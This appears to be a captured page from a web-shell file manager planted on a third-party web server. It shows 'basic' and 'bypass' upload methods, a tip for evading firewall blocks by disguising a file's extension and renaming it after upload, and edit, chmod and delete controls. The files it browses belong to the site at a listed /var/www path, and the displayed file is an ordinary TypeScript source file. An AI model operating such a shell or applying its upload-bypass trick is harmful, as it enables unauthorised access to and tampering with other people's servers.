Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
var
www
uibuilder.cmshelp.dk
httpdocs
node_modules
@react-dnd
asap
src
File Content:
RawTask.ts
// We wrap tasks with recyclable task objects. A task object implements import type { Task, TaskFn } from 'types' // `call`, just like a function. export class RawTask implements Task { public task: TaskFn | null = null public constructor( private onError: (err: any) => void, private release: (t: RawTask) => void, ) {} public call() { try { this.task && this.task() } catch (error) { this.onError(error) } finally { this.task = null this.release(this) } } }
Edit
Download
Unzip
Chmod
Delete